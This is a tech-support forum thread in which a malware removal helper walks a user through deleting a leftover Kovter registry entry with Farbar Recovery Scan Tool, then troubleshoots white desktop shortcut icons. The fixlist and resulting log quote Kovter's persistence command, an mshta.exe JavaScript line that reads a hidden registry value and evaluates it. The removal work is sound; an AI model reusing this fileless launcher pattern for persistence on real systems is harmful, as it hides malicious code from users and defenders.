  • Gender:Male
  • Local time:08:25 AM

Posted 22 October 2016 - 08:49 AM

There's only one Kovter entry left to delete, here goes.

iO3R662.pngFarbar Recovery Scan Tool (FRST) - Fix mode
Follow the instructions below to execute a fix on your system using FRST, and provide the log in your next reply.
  • Right-click on your Desktop, select New and click on Text Document. Name it fixlist (make sure it's a .txt file) and press on Enter;
  • Open the file you just created and copy/paste the content below in it, then save it (Ctrl + S);
    CloseProcesses:
    
    HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\Software\Classes\2216cc: "C:\Windows\system32\mshta.exe" "javascript:YYgShx7="J";m2a9=new ActiveXObject("WScript.Shell");TyNMG7="sm";tvu2T=m2a9.RegRead("HKCU\\software\\vnwyudxovn\\kcfs");gN8SL="9XM";eval(tvu2T);IQNZF98="ul9qNBej";" <===== ATTENTION
    
    REG: REG QUERY "HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\Software\Classes\2216cc" /s
    
  • Right-click on the FRST executable and select Spcusrh.pngRun as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users);
  • Click on the Fix button;
    NYA5Cbr.png
  • On completion, a message will come up saying that the fix has been completed and it'll open a log in Notepad;
  • Copy and paste its content in your next reply;
And by white icon, do you mean this?
new_256.png

animinionsmalltext.gif
unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#11 pmate888

pmate888
  • Topic Starter

  • Members
  • 14 posts
  • OFFLINE
  •  
  • Local time:03:25 AM

Posted 22 October 2016 - 01:29 PM

hi Aura

i created the fixlist.txt file and ran FRST fix as instructed.  the contents of the Fixlog.txt file is:

 

Fix result of Farbar Recovery Scan Tool (x64) Version: 17-10-2016
Ran by Wayne (22-10-2016 08:00:48) Run:5
Running from C:\Users\Wayne\Desktop
Loaded Profiles: Wayne (Available Profiles: Wayne)
Boot Mode: Normal
==============================================

fixlist content:
*****************
CloseProcesses:

HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\Software\Classes\2216cc: "C:\Windows\system32\mshta.exe" "javascript:YYgShx7="J";m2a9=new ActiveXObject("WScript.Shell");TyNMG7="sm";tvu2T=m2a9.RegRead("HKCU\\software\\vnwyudxovn\\kcfs");gN8SL="9XM";eval(tvu2T);IQNZF98="ul9qNBej";" <===== ATTENTION

REG: REG QUERY "HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\Software\Classes\2216cc" /s
*****************

Processes closed successfully.
"HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\Software\Classes\2216cc" => key removed successfully

========= REG QUERY "HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\Software\Classes\2216cc" /s =========

ERROR: The system was unable to find the specified registry key or value.


========= End of Reg: =========



The system needed a reboot.

==== End of Fixlog 08:00:51 ====

 

FRST recommended a reboot and i complied, no problems surfaced.

 

i resolved the desktop.ini files problem by going into windows explorer folder and search options and selecting "Dont show hidden files, folders or drives" and checking the "Hide protected operating system files" lines.  the desktop.ini files are not displayed anymore.

 

the white icons for web shorcuts problem remains.  the white icons look like the image in your last response.

 

thank you very much for your help!  i recommended my friends come to bleepingcomputer.com if they have virus, malware, etc problems for expert help rather than guessing on fixes found by google searches.  my problem may have been a minor thing to you but i would not have been able to fix it on my own and i really appreciate your assistance!



#12 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,697 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:08:25 AM

Posted 22 October 2016 - 02:11 PM

Yes, the desktop.ini files are hidden system files, so if check the option to hide them, you won't see them anymore.

If you click on a shortcut, does it still opens in one of your web browser (if so, which one), or does it asks you what program you want to open that file with?

And we're always ready to assist whoever needs help here, so feel free to recommend BleepingComputer to everyone you know :)

animinionsmalltext.gif
unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#13 pmate888

pmate888
  • Topic Starter

  • Members
  • 14 posts
  • OFFLINE
  •  
  • Local time:03:25 AM

Posted 23 October 2016 - 01:27 AM

hi Aura

the shortcuts open in Firefox, my default browser.  the shortcuts work ok in that they open the webpage correctly but it just displays the white page icon.  it normally has the browser icon or a webpage icon.

 

existing shortcut icons display the white page icon. if i change default browser to google chrome or internet explorer, the icons do not change, it still displays the white page icon.

 

if i create a new shortcut by highlighting the url from internet explorer browser or google chrome browser (both not default browser) and drag to desktop, the shortcut displays the browser icon or webpage icon.  if i create a new shortcut by highlighting the url from firefox browser, the shortcut displays the white page icon.

 

cant figure out how to correct this, any help you can provide would be really appreciated.

thank you!



#14 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,697 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:08:25 AM

Posted 23 October 2016 - 09:21 AM

Let's check something.

if i create a new shortcut by highlighting the url from internet explorer browser or google chrome browser (both not default browser) and drag to desktop, the shortcut displays the browser icon or webpage icon.


Right-click on one of these icon, and select Properties, then go to the General tab. What's the Type of file (name and extension)?

if i create a new shortcut by highlighting the url from firefox browser, the shortcut displays the white page icon.


Follow the same instructions as above for one of these shortcuts as well, and give me the Type of file (name and extension).

animinionsmalltext.gif
unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#15 pmate888

pmate888
  • Topic Starter

  • Members
  • 14 posts
  • OFFLINE
  •  
  • Local time:03:25 AM

Posted 23 October 2016 - 01:21 PM

hi Aura

type of file for the shortcut icon created by internet explorer says "Pinned Site Shortcut (.website)"

type of file for the shortcut icon created by google chrome says"Internet Shortcut (.url)"

type of file for the shortcut icon created by firefox (default browser) says "Internet Shortcut (.URL)"

 

thank you for your help!






0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users